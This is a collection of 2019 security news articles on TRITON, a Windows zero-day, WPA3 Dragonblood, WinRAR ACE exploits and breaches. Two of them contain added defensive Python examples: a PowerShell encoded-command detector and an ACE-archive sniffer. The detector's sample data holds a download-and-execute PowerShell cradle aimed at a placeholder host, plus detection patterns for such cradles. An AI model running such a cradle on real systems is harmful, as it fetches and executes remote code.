STE WILLIAMS

TRITON Attacks Underscore Need for Better Defenses

As attackers focus on cyber-physical systems, companies must improve their visibility into IT system compromises as well as limit actions on operational-technology networks, experts say.

Security experts have a warning for critical-infrastructure companies: The group behind the TRITON attack on industrial control systems is not unique. 

After revealing last week that the same set of tools used by the TRITON attackers were also found in a second victim’s network, security services firm FireEye stressed that attackers are likely in the networks of some of the facilities that are home to the 18,000 Triconex safety systems installed in plants worldwide.

“The reason we published this information is that we believe this is happening elsewhere,” says Nathan Brubaker, senior manager of cyber threat analysis at FireEye. “We found them twice, and that is not very likely considering how many targets there are in the world. There is a decent chance they are in other systems.”

The findings underscore that critical-infrastructure companies are increasingly in the crosshairs of attackers, particularly nation-state operatives who may be attempting to find ways to hobble rival nations in the event of hostilities. In the middle of 2017, for example, two ransomware attacks—WannaCry and NotPetya—encrypted data on computer systems worldwide, causing some operational-technology (OT) networks at large companies to halt. Pharmaceutical manufacturer Merck, package delivery service FedEx and shipping firm A.P. Moller-Maersk were all victims of the attacks.

At the end of that year, a Middle East plant was the victim of a more targeted attack. Attackers compromised the IT network of a petrochemical firm – reportedly Petro Rabigh, an integrated refinery and petrochemical facility on the west coast of Saudi Arabia – and infected its systems with the TRITON malware framework, which could have caused significant damage to the facility.

“Attackers have moved from spreading malware to cause widespread havoc across multiple systems—without a specific target—to gaining detailed technical knowledge on industrial control systems to target specific industries, countries, and companies,” says Mark Carrigan, chief operating officer at PAS Global. “This increased sophistication increases the chance that they can cause physical damage at an industrial facility.”

Companies need to better defend themselves, experts say, and gaining better visibility into traffic and anomalies on the information-technology network is a good first step.

FireEye, for example, underscored that it detected both TRITON attacks by improving the visibility that defenders had into the activity on their network. Last week in Singapore, FireEye released details of the second attack at the Kaspersky Security Analyst Summit, identifying specific tools discovered on systems in the unnamed company’s network. While FireEye did not say that it found the specific malware component of the TRITON framework that targets Schneider Electric Triconex safety systems, the company did find the same collection of tools that a group had previously used to attack the Saudi Arabian petrochemical firm.

“We have high confidence that it is the same group,” Brubaker says.

By identifying and tracking key hubs of activity and “arterial systems,” companies can spot attackers’ activities before they impact OT systems, he says.

“The point of our blog is that you can stop 95% of attacks against industrial control systems—like sophisticated attacks—by looking for—by monitoring and defending against those attacks … this is how we caught this threat actor in the new environment,” Brubaker says.

Broader Focus

Security firms focused on the security of industrial systems argued that companies should focus on both IT and OT systems. Unless a firm has perfect visibility into the traffic on its network, focusing on only one half of the equation seems misguided, says Joe Slowik, adversary hunter for Dragos, an industrial control system (ICS) security firm.

“There are a number of advantages in focusing on the OT environments,” he says. “They are, presumably, more limited in scope than what you see with an IT network, so you can take advantage of that to build out a better defensive posture … We cannot control or predict what the adversary will do, but we can restrict the capabilities they have once they are in our environments.”

Because the TRITON attack is only the latest in a series of compromises of industrial control systems, critical-infrastructure firms should focus on all their ICS assets, adds PAS Global’s Carrigan. 

“These systems are highly designed and engineered so that in case of any failure, the process is shut down gracefully,” he says. So attackers will likely aim to “defeat the safety system, and in parallel, infiltrate additional industrial control systems at the same facility to manipulate the process beyond safe operating limits, which can lead to equipment damage, environmental incidents, and loss of life.”

The problem for most firms, however, is that making changes in the operational technology environment is almost never straightforward. 

“Every asset manager that has been paying attention, every single one of them will agree that there are issues and changes that need to be made,” says Dragos’ Slowik. “The issue comes down to what sort of timing and lifecycle is available to you to be able to implement those changes.”


Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline …

Article source: https://www.darkreading.com/vulnerabilities---threats/triton-attacks-underscore-need-for-better-defenses/d/d-id/1334418?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Details Emerge on Windows Zero Day

The CVE-2019-0859 vulnerability, patched last week, is the latest in a string of Windows local privilege escalation bugs discovered at Kaspersky Lab.

Kaspersky Lab researchers today disclosed more details about CVE-2019-0859, one of two Windows zero-day vulnerabilities under active attack when Microsoft issued patches early last week.

CVE-2019-0859 and CVE-2019-0803 are elevation of privilege bugs. The former was discovered by Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin, the latter by Alibaba’s Cloud Intelligence Security Team. Berdnikov and Larin teamed up with malware analyst Anton Ivanov to publish more insight around the flaw, which has been reportedly exploited by an “unknown criminal group” trying to gain full control on a target device.

Kaspersky Lab found CVE-2019-0859 last month when its automatic exploit prevention systems detected an attempt to abuse a Windows vulnerability. Further analysis revealed a zero-day bug in win32k.sys – the fifth exploited local privilege escalation vulnerability in Windows the researchers had discovered since October. They reported the bug to Microsoft on March 17; it was patched along with 73 other vulnerabilities on the most recent Patch Tuesday.

The exploit Berdnikov and Larin saw in the wild targeted 64-bit versions of Windows, ranging from Windows 7 to 10. This particular attack was directed at the kernel of target systems via a backdoor constructed from a core component of the Windows operating system.

Following successful exploitation, it executed PowerShell with a Base64 encoded command. This command downloaded a second-stage script from PasteBin, and the second-stage PowerShell script executed the third stage – also a PowerShell script. This final script unpacks shellcode, allocates executable memory, copies shellcode to allocated memory, and calls CreateThread to execute shellcode, researchers explain in a blog post. Its primary goal was to create a backdoor, which provided the attacker with persistent access on the target system.

As Microsoft put it in its advisory, CVE-2019-0859 would let a successful attacker run malicious code in kernel mode and install programs; view, change, or delete data; or create new accounts with full user rights. The attacker would first have to log on to the system and run the crafted application.

“This allows you to escalate privilege and get the same privileges the system has,” Larin says. “It’s the highest level of privilege you can have.”

What makes this incident particularly interesting is the attacker used the Metasploit framework, a publicly available tool, in conjunction with an exploit that’s much harder for attackers to come by. “Zero-day exploits [are] not available for the general public,” Larin continues. “Only advanced actors use them.” The use of Metasploit also complicates attribution in this scenario, Larin explains, because it’s freely available for everyone.

Taking a look back, this string of privilege escalation bug discoveries started with CVE-2018-8453, which was found by the Kaspersky Lab team in August and fixed in October. The exploit was seen being used in targeted attacks, during which it was executed by the first stage of a malware installer to achieve privileges needed to persist on victim systems. In November, Microsoft patched CVE-2018-8589, another Windows zero-day found by the KL researchers.

The trend continued: December brought a patch for CVE-2018-8611, a Win32k elevation of privilege flaw inside the Kernel Transaction Manager that could be used to escape the sandbox in modern browsers. In March, Microsoft patched CVE-2019-0797, a Windows zero-day believed to be in use among several attack groups, including FruityArmor and SandCat.

Cybercriminals are quickly ramping up their use of PowerShell malware, which grew 432% in 2017. This type of malware abuses the legitimate functionality of the scripting tool to launch malicious activity; it’s a popular target because it simplifies the concealment of illicit activity.
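The chain described in this article (a PowerShell stage launched with a Base64-encoded command that fetches further stages from a paste site before any shellcode runs) is something endpoint telemetry can surface early, and it is the pattern behind the growth in PowerShell malware noted above. The following is an added example, not code from the article or from Kaspersky Lab: a small Python triage routine that takes process-creation events (the constructed sample events stand in for normalised Sysmon Event ID 1 or Windows Security 4688 records), decodes any -EncodedCommand argument the way powershell.exe does (Base64 of UTF-16LE text), and scores the decoded script against a few well-known indicators. The paste-site URL in the sample is a placeholder, and the indicator list and severity thresholds are the example's own choices.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional


def encode_for_powershell(script: str) -> str:
    """powershell.exe -EncodedCommand takes Base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for the stage-one behaviour the article describes; the
# paste-site URL is a placeholder, not the one used in the incident.
STAGE_ONE = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.example/raw/PLACEHOLDER')"

# Constructed process-creation events, in the shape a SIEM might hold them after
# normalising Sysmon Event ID 1 or Windows Security 4688 records.
SAMPLE_EVENTS = [
    {"pid": 4012, "cmdline": "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(STAGE_ONE)},
    {"pid": 4020, "cmdline": "powershell.exe -Command Get-Service -Name Spooler"},
    {"pid": 4031, "cmdline": "powershell.exe -EncodedCommand "
                             + encode_for_powershell("Get-Date | Out-File C:\\temp\\heartbeat.txt")},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match the prefix family followed by a Base64 token rather than
# the full switch name. -ExecutionPolicy and -ep do not match because 'x' and
# 'p' are not letters of "encodedcommand".
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-e[encodma]*\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")

# Indicators chosen for this example; a production rule set would be broader.
INDICATORS = {
    "download cradle": re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
    "paste site": re.compile(r"(?i)pastebin"),
    "in-memory execution": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "shellcode loader": re.compile(r"(?i)VirtualAlloc|CreateThread|Marshal\.Copy"),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script text from an -EncodedCommand argument, or None if absent or invalid."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None  # not Base64 after all: leave it to other rules
    return raw.decode("utf-16-le", errors="replace")


def triage(events: List[Dict]) -> List[Dict]:
    """Decode each encoded PowerShell launch and score it against the indicator list."""
    findings = []
    for ev in events:
        script = decode_encoded_command(ev["cmdline"])
        if script is None:
            continue  # no encoded command: outside this rule's scope
        hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
        if HIDDEN_WINDOW.search(ev["cmdline"]):
            hits.append("hidden window")
        severity = "high" if len(hits) >= 2 else ("medium" if hits else "low")
        findings.append({"pid": ev["pid"], "decoded": script, "indicators": hits, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"pid={f['pid']} severity={f['severity']} indicators={f['indicators']}")
        print("   decoded:", f["decoded"])
```

Run directly, the script prints two findings: the hidden, paste-fetching launch scores high, while the encoded but harmless Get-Date command is recorded with no indicators so an analyst can see the decoded text rather than an opaque Base64 blob. Decoding before matching is the point: string rules applied to the raw command line never see the cradle.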



Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/vulnerabilities---threats/new-details-emerge-on-windows-zero-day/d/d-id/1334422?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Microsoft Downplays Scope of Email Attack

An unknown attacker used a support agent’s credentials to access email content belonging to some Outlook, Hotmail users.

Microsoft on Monday maintained that an incident reported over the weekend, in which an unknown attacker used a customer support agent’s credentials to access email content belonging to users of MSN, Outlook, and Hotmail accounts, affected only a limited number of users.

In initial comments on Saturday to TechCrunch—the first to report on the intrusion—Microsoft confirmed that email accounts belonging to just a few users had been compromised.

The company said the attackers had not accessed or viewed the actual content of the emails or any attachments. Instead, only certain other information related to a user’s account such as the email address, subject lines, email folders, and email addresses of people the user has communicated with, had been viewed or accessed.

An email from Microsoft to one of the victims, later posted to Reddit on Saturday, described the unauthorized access as lasting from Jan. 1, 2019 to March 28, 2019. The letter warned the user to be wary of phishing attempts while noting that Microsoft had no idea why the intruders might have viewed the email information or how it might have been used. Microsoft immediately disabled the stolen credentials, preventing further misuse, the company said.

In later comments, including those made to Dark Reading today, Microsoft admitted that the intruders had actually accessed and viewed email content in some cases. The company did not provide any specifics on the number of users that might have had their email accounts compromised in this manner, however.

“Our notification to the majority of those impacted noted that bad actors would not have had unauthorized access to the content of e-mails or attachments,” a Microsoft spokesperson said. However, for approximately 6% of the already “limited subset” of users that were impacted, the attackers had unauthorized access to email content as well.

“We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access,” the company said. Microsoft also has increased detection and monitoring of the impacted email accounts out of an abundance of caution.

Questions Remain

The relatively scant details from Microsoft about the intrusion are prompting questions about how attackers might have obtained the support agent’s credentials, why the breach remained undetected for close to three months, how the company discovered it, and what the intruders might have been after.

Similarly, it’s unclear if the support agent was specifically targeted because of the access that his or her credentials provided to customer email information.

“This breach, albeit seemingly fairly limited in scope, still follows a familiar pattern,” said David Higgins, technical director at CyberArk. “Attackers compromised privileged credentials in order to gain greater access to wider customer data.” The takeaway for enterprises is to pay more attention to administrator accounts and to accounts with privileged access to sensitive customer and business data.

Attacks involving the use of valid credentials can be very hard to detect, added Tim Erlin, vice president of product management and strategy at Tripwire. So it is important for organizations to ensure and enforce separation of duties to mitigate the scope of attacks such as the one on Microsoft, he said.

“While there’s a certain amount of schadenfreude in discussing the security failings of a company like Microsoft, these types of incidents should really force every organization to evaluate how they’ve implemented their own security controls,” Erlin said.

News of the Microsoft email hack came, somewhat ironically, just days after news of Yahoo reaching a $117.5 million accord with victims of breaches at the company that exposed email addresses, passwords, and other data of some 3 billion users.



Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/attacks-breaches/microsoft-downplays-scope-of-email-attack-/d/d-id/1334423?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Data on Thousands of Law Enforcement Personnel Exposed in Breach

Unknown hackers broke into databases of a nonprofit and have posted online personal info on FBI, Secret Service, Capitol Police, US Park Police, and other personnel.

A data breach of systems operated by chapters of an FBI-affiliated nonprofit organization has exposed personal information of thousands of law enforcement personnel and affiliated individuals.

According to the Associated Press, home addresses and phone numbers, emails, and employers’ names were published online on at least 1,400 employees of the FBI, Secret Service, Capitol Police, US Park Police, and other federal agencies as well as police and sheriffs’ deputies in North Carolina and Florida. This was part of a data release exposing information on more than 23,000 people overall.

The hacked databases were operated by three chapters of the FBI National Academy Associates Inc, a 501(c)(3) organization that, according to its mission statement, is dedicated to “Impacting communities by providing and promoting law enforcement leadership through training and networking.” Association members are graduates of the FBI National Academy Program.

Evidence indicates the hackers were able to capture significantly more data than they posted online; the stolen information is believed to be available for purchase by criminals.

For more, read here and here.


Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/application-security/data-on-thousands-of-law-enforcement-personnel-exposed-in-breach/d/d-id/1334424?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Dragonblood: Data-leaking flaw in WPA3 Wi-Fi authentication

Researchers have discovered several holes in a new security protocol for wireless networks. It warrants patching because although no one has exploited the bugs in the wild yet, they’re severe enough to let people steal your Wi-Fi passwords.

Researchers Mathy Vanhoef of New York University Abu Dhabi and Eyal Ronen of Tel Aviv University and KU Leuven discovered the flaws in the WPA3 Wi-Fi authentication protocol. They published the results of their research in a technical paper, which you can get from Vanhoef’s dedicated microsite. Vanhoef also discovered the KRACK vulnerability that affected WPA2 in 2017.

The Wi-Fi Alliance launched WPA3 in June 2018 to improve security over the previous Wi-Fi standard, WPA2. It came in two flavours: WPA3-Personal, and WPA3-Enterprise.

WPA3-Personal is the problematic one. It uses an authentication protocol called Simultaneous Authentication of Equals (SAE), also known as Dragonfly. A WPA3-Personal device uses it as a handshake mechanism to connect with other Wi-Fi-enabled devices.

In a paper on the topic, the pair explained:

Even with WPA3, an attacker within range of a victim can still recover the password of the network. This allows the adversary to steal sensitive information such as credit cards, password, emails, and so on, when the victim uses no extra layer of protection such as HTTPS.

The researchers discovered several attacks against the protocol that fall into three categories. The first forces a device to downgrade the security it is using. The second gives attackers enough information to deduce a password from side-channel information, which is data leaked incidentally as part of another process. The third is a denial of service attack.

One of the downgrade bugs relies on WPA3’s backward compatibility with WPA2, which the Alliance included to make the transition to new devices smoother.

WPA3 devices interacting with WPA2 kit use a mode called WPA3-Transition. An attacker can force WPA3 devices using this mode to connect using WPA2 and capture part of the WPA2 handshake, which they can then use to recover the Wi-Fi password.

There are two side-channel attacks. The first targets WPA3 access points that use a particular security group, the mathematical group in which the handshake exchanges its secrets.

Access points using the multiplicative security groups modulo a prime have a response time that varies according to the password being used. An attacker can work out how long it would take for the access point to process each password in their dictionary. They can then use the observed time to narrow down the list of possible passwords.

Attackers with access to the client device connecting to a network can also look at its memory access patterns when it’s in the middle of a Dragonfly handshake because they reveal information about the password being used. They could do this using something as simple as browser-based JavaScript code, the researchers say. Then, it’s off to the races with another dictionary attack.

This dictionary attack wouldn’t take long, they add:

The side-channel vulnerabilities can, for instance, be abused to brute-force all 8-character lowercase passwords with as little as $125 worth of Amazon EC2 instances.

Finally, an attacker can also flood an access point by bypassing the technique that WPA3 uses to stop people using fake MAC addresses. It can bring a network to its knees with as few as 16 forged connection attempts per second, they said.

As part of their research, the researchers also discovered serious flaws in EAP-PWD, a protocol that authenticates using a password. It is used in Android 4.0 and in remote access servers using the RADIUS protocol, and infrequently by some Wi-Fi networks. These bugs could allow an attacker to impersonate a user and access a Wi-Fi network without knowing the user’s password, they said.

At the time of writing, the researchers had not released the EAP-PWD details, because the bugs were so severe.

Luckily, these researchers followed responsible disclosure. They informed the Wi-Fi Alliance before releasing their findings, and it issued a press release. It said:

WPA3-Personal is in the early stages of deployment, and the small number of device manufacturers that are affected have already started deploying patches to resolve the issues.

What to do

If you have a WPA3 wireless access point at home, check with your vendor to see if there is a patch. And as always, be extra careful when connecting to public access points over which you have no control. Client-side virtual private networks (VPNs) to encrypt your data are always a good idea.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/SHjec1-y4I8/

Is there a link between videogaming and cybercrime? Police think so

UK police are planning to issue online warnings to young gamers hoping to deter them from a life of cybercrime, they revealed last week.

Officers planning a multimillion-pound cybercrime prevention drive identified a link between teenage gamers and cybercrime, warning that 82% of young people recruited by online criminals had developed their cybercrime skills through video gaming. Peter Goodman, chief constable at the Derbyshire Constabulary and cybercrime lead for the National Police Chiefs’ Council (NPCC) said many in this group were “on the autistic spectrum”.

In a statement sure to anger many young video game players, Goodman added that many of them lack any credibility or traction in the real world, and get their self-esteem from online gaming.

Kids will often cheat online, which sets up a dark path for them, he added:

It’s really easy to take the next step into sending malware to their school because they don’t like the way they are treated at school, or sending some malware to the local housing office and shutting them down because mum and dad haven’t got the house they want.

Police have been taking measures to catch these kids early and set them on the right track, he said:

If you go to certain sites as a gamer and you are looking for opportunities to cheat online, if you are of a certain age profile, you will have a message pop up from the National Crime Agency on the screen which will say ‘Do you know what you’re about to do is probably illegal? It’s a Computer Misuse Act offence.’

Gamers have regularly been the subject of concern among anti-cybercrime groups. In 2016, the National Crime Agency (NCA) teamed up with security testing certification non-profit organization CREST to produce a report that also suggested a link between computer gaming and serious cybercrime.

The report, called Identify, Intervene, Inspire, even published a kind of cybercrime career pathway which began with computer gaming and online gaming before moving into cheating, computer game modifications, and participation in hacking forums. Young people would then progress into trying to “beat the system”, before moving into crime for financial gain and finally serious cybercrime, it said.

The National Crime Agency’s National Cyber Crime Unit (NCA NCCU) sent letters or emails to young people who had registered their details on websites encouraging illegal activities, the report said. Sometimes, police even visited their homes.

The NPCC announcement last week created a dedicated cybercrime unit for every police force in England and Wales, granting them access to £7m in funding. The UK’s Regional Organised Crime Units (ROCUs) will coordinate the new local units, the NPCC said. Previously, only 31% of police forces had a dedicated anti-cybercrime capability, it explained.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/THe9BMsPrIE/

Microsoft’s Edge browser reborn after Chromium makeover

After three years of embarrassing rejection, might Microsoft’s newly-Chromed Edge browser be on the up?

The company last week released two 64-bit Windows 10 versions of its handiwork, the first tagged as ‘Dev channel’ updated weekly, the second a ‘Canary Channel’ version updated daily (a more stable Beta Channel version with six-weekly updates is in the works).

Drip feeding enthusiasts something new is never a bad approach, especially now that Edge is no longer a feature buried inside Windows 10 and wants to be a story on its own.

Ironically, the big anticipation of this new Edge is that it’s now based on open-source Chromium, the same code used by Google inside its Chrome browser which has pounded Microsoft for nearly 11 years.

The download even says Chromium version 74.1.96.24, not far behind the timeline published for Google’s Chrome 74 even if the new Edge is still months off a final release. As Windows corporate vice president Joe Belfiore warned:

In these first builds we are very much focused on the fundamentals and have not yet included a wide range of feature and language support that will come later.

As Naked Security noted in December when the announcement was made, it’s a huge change marker for Microsoft, which for years invested heavily in its in-house EdgeHTML and Chakra-powered Edge codebase as the natural successor to Internet Explorer (IE).

A lot of people thought Edge was a decent browser whose take-up remained stubbornly around 4% because users had long since settled on Chrome, Firefox or Safari to do the job.

Others complained that it was riddled with almost as many security problems as its ill-fated predecessor and was too wedded to its own non-standard technologies that developers disliked.

Narrowing gene pool

What is unmistakable is that three of the top five popular browsers are now based on Chromium, the other being Opera. That leaves Safari, tied to Apple, and Firefox as the only independents.

Critics might point out that this looks a lot like the IE monoculture that spurred the development of Firefox in 2002, and Google Chrome in 2008, as Redmond dawdled. (Between those two dates, excluding service packs, Microsoft released only one version, IE 7.)

Assuming Microsoft backports it to replace the forlorn IE, and converts current Windows 10 Edge users, this will mean that Chromium-based browsers will have up to 85% browser user share.

Microsoft will contribute to Chromium but there’s no getting away from the power Google now has.

Alternatively, the Chromium Edge browser’s selling point will be that it is a way to have something that looks and behaves a lot like Chrome without being as intimately connected to Google’s surveillance.

One could argue that Microsoft has an interest in the same surveillance but that would remain true had it stuck to its current Edge browser.

As for how many users will take to the new Edge, it’s hard to imagine it won’t do better than the current Microsoft version (converting IE holdouts could ensure that).

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/zDZ6KAfJJCc/

Flood of exploits targeting ancient WinRAR flaw continues

Identified as CVE-2018-20250, an ancient WinRAR vulnerability made public in February is now well on its way to becoming one of the most widely and rapidly-exploited security flaws of recent times.

The latest evidence is a report from Microsoft’s Office 365 Threat Research team which identified it as being used by the ‘MuddyWater’ APT group to target organizations in the satellite and communications industry.

For those unfamiliar with WinRAR, it’s a hugely popular Windows compression utility dating back to the 1990s which, a security company discovered, had a serious RCE flaw that had been sitting inside it for 19 years.

WinRAR was far too tempting for cybercriminals to ignore, and within days they had stirred up a hornet’s nest of exploits to the tune of 100 or more.

Exploiting the vulnerability depended on a defunct file format called ACE, support for which the utility’s developers dropped with the release of version 5.71 beta after they were told of the issue in advance of its disclosure.

That was weeks before its existence became public but unfortunately, news travels slowly and a lot of users failed to update.

In that sense, Microsoft’s blog about recent targeted attacks serves as a warning to organisations or individuals who haven’t done that yet.

Detected in early March, it’s a sophisticated nation-state phishing attack (hence the APT designation, which signifies this type of attacker) that uses as its lure a Word attachment claiming to be from the Ministry of Foreign Affairs (MFA) of the Islamic Republic of Afghanistan.

Opening this triggers a further download from a OneDrive link (now inactive) to an archive containing a second Word file within which is embedded a macro initiating the payload.

Eventually a PowerShell script runs, opening a command backdoor through which the attackers deliver the malicious ACE file carrying the CVE-2018-20250 exploit.

It’s involved stuff because the attackers still have to trick the user, via a bogus warning dialogue, into restarting the PC for the attack to work. Despite that, this kind of attack is founded on a percentages game that assumes someone will fall for the ruse – and one is more than enough for a targeted attack.

As Microsoft observes:

The attacks that immediately exploited the WinRAR vulnerability demonstrate the importance of threat vulnerability management in reducing organizational risk.

What is striking is how similar the attack design described by Microsoft is to numerous other reported attacks exploiting the same WinRAR vulnerability.

How did a flaw stay hidden for so long?

Because software development can be complicated, as WinRAR’s developers noted in their release notes for the patched version:

WinRAR used this third-party library to unpack ACE archives. UNACEV2.DLL had not been updated since 2005 and we do not have access to its source code. So we decided to drop ACE archive format support to protect security of WinRAR users.

Patch or remove

Apart from updating or removing WinRAR, admins might want to send out a warning about the attack MO, especially the rule of not opening ACE archives under any circumstances (remembering that archives can be renamed to avoid suspicion).
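The parenthetical about renamed archives is the practical problem with the warning above: a mail or proxy rule keyed on the .ace extension is defeated by renaming the file .rar or .zip. The format itself is harder to hide, because an ACE archive carries the ASCII signature **ACE** at byte offset 7 of its main header (after the header CRC, size, type and flag bytes), while RAR and ZIP archives carry their own signatures at offset 0. The following is an added example, not code from the article, WinRAR or Microsoft: a Python content-sniffing check that classifies files by signature rather than by name, blocks ACE content whatever the file is called, and flags any other mismatch between content and extension for review. The sample byte strings are constructed stand-ins in which only the signature bytes are meaningful, and the verdict labels are the example's own.

```python
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Archive signatures as (byte offset, magic bytes). ACE is the odd one out in
# placing its marker after a 7-byte prefix (header CRC, header size, header
# type, header flags) rather than at the start of the file.
MAGICS = {
    "rar": (0, b"Rar!\x1a\x07"),   # common prefix of the RAR 4.x and RAR 5 markers
    "zip": (0, b"PK\x03\x04"),
    "ace": (7, b"**ACE**"),
}
HEADER_BYTES = 32  # enough to cover every offset + magic above


def sniff_archive(header: bytes) -> Optional[str]:
    """Return the archive type implied by the file's leading bytes, or None."""
    for kind, (offset, magic) in MAGICS.items():
        if header[offset:offset + len(magic)] == magic:
            return kind
    return None


def classify(name: str, header: bytes) -> Dict[str, Optional[str]]:
    """Decide by content, not by name: ACE is blocked outright, mismatches go to review."""
    ext = Path(name).suffix.lower().lstrip(".")
    kind = sniff_archive(header)
    if kind == "ace":
        verdict = "block"
        reason = "ACE container" + (" disguised as .%s" % ext if ext != "ace" else "")
    elif kind is not None and ext != kind:
        verdict = "review"
        reason = "content is %s but extension is .%s" % (kind, ext or "(none)")
    else:
        verdict, reason = "allow", ""
    return {"name": name, "ext": ext, "content": kind, "verdict": verdict, "reason": reason}


def scan_directory(root: Path) -> List[Dict[str, Optional[str]]]:
    """Read only the header of each file; nothing is decompressed or opened by an archiver."""
    results = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        with path.open("rb") as fh:
            results.append(classify(path.name, fh.read(HEADER_BYTES)))
    return results


# Constructed samples: placeholder CRC/size/type/flag bytes, then the real magic.
SAMPLE_FILES = {
    "quarterly_report.rar": b"\x00\x00\x2d\x00\x00\x00\x00**ACE**" + b"\x00" * 16,  # ACE renamed to .rar
    "backup.rar": b"Rar!\x1a\x07\x00" + b"\x00" * 16,
    "photos.zip": b"PK\x03\x04" + b"\x00" * 16,
    "notes.txt": b"plain text, not an archive",
}

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for fname, body in SAMPLE_FILES.items():
            (root / fname).write_bytes(body)
        for r in scan_directory(root):
            print("%-7s %-22s content=%-4s %s" % (r["verdict"], r["name"], r["content"], r["reason"]))
```

Run against the constructed directory, the renamed ACE file is blocked while the genuine RAR and ZIP files pass. The check reads 32 bytes per file and never hands the data to an unarchiver, so it is safe to run on a mail gateway or download directory as a first filter ahead of the WinRAR update itself.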

The other takeaway is not to assume that, because the attacks detected so far have been connected to nation states, this will always be the case. Commercial exploits won’t be far behind – WinRAR’s half a billion reported users is a lot of victims to aim at.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/DaNZI5jrH1c/

US-Cert alert! Thanks to a massive bug, VPN now stands for ‘Vigorously Pwned Nodes’

The US-Cert is raising alarms following the disclosure of a serious vulnerability in multiple VPN services.

A warning from the DHS cyber security team references the CMU Cert Coordination Center’s bulletin on the failure of some VPN providers to encrypt the cookie files they place onto the machines of customers.

Ideally, a VPN client would encrypt the session cookies that are created when a user logs in to access the secure traffic service, keeping them away from the prying eyes of malware or network attacks. According to the alert, however, those cookies were sometimes kept unencrypted, either in memory or in log files, allowing them to be freely copied and re-used.


“If an attacker has persistent access to a VPN user’s endpoint or exfiltrates the cookie using other methods, they can replay the session and bypass other authentication methods,” the post explains. “An attacker would then have access to the same applications that the user does through their VPN session.”

To be clear, the vulnerable cookies are on the user’s end, not on the server itself. We’re not talking about a takeover of the VPN service, but rather an individual customer’s account. The malware would also need to know exactly where to look on the machine in order to get the cookies.

So far, vulnerable parties include Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS, Pulse Secure Connect Secure prior to 8.1R14, 8.2, 8.3R6, and 9.0R2, and Cisco AnyConnect 4.7.x and prior. Palo Alto has already released a patch.

Check Point and pfSense, meanwhile, have confirmed they do encrypt the cookies in question.

Possibly dozens more vendors are going to be added to the list, however, as this practice is believed to be widespread. The site notes that over 200 apps have yet to confirm or deny that their session cookies are left unencrypted.

“It is likely that this configuration is generic to additional VPN applications,” the notice explains. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/12/uscert_vpn_alert/

Brit Watchkeeper drone fell in the sea because blocked sensor made algorithms flip out

A British Army Watchkeeper drone stalled itself and crashed into the sea on a bad weather flight test, military investigators have said – though most of the wreckage was never found.

The unmanned aircraft, tail number WK042, fell from the sky in February 2017 while trialling a new ice detection system. The drone was being flown from West Wales Airport, formerly known as Aberporth Airfield, by 47 Regiment Royal Artillery.

Investigators concluded that one of its pitot probes used for reading the aircraft’s speed and angle of attack (AOA) became blocked, causing the Watchkeeper’s onboard flight control logic to enter an erratic series of climbs and dives until it stalled itself and flopped into the sea. They criticised the craft’s maker, Thales, for not fully understanding how its algorithms responded to loss of accurate sensor data.

Air Marshal Susan Gray, director-general of the Defence Safety Authority, criticised the Ministry of Defence and Thales for their “incomplete level of detailed technical understanding” regarding the drone and its systems. So far the British military has crashed five Watchkeepers, including two in quick succession during 2017, which led to a months-long grounding of the entire fleet.

Those two crashes, of which WK042 was one, were not publicly revealed until a senior Navy officer blabbed about them within earshot of a sharp-eared reporter, prompting accusations of an MoD cover-up over the troubled multimillion-pound programme.

The automated decision-making that led to the crash has some parallels with the recent Boeing 737 Max controversy, in which automated flight control software has been fingered as a potential factor in two fatal airliner crashes that cost hundreds of lives. The Watchkeeper crash investigators stated:

The software algorithms used to identify and disqualify single sensor failure were not always well understood by [Thales] within the UK. Consequently, the effectiveness of the algorithms at maintaining the integrity of the air data required by the [flight control system] for safe flight was in part unknown.

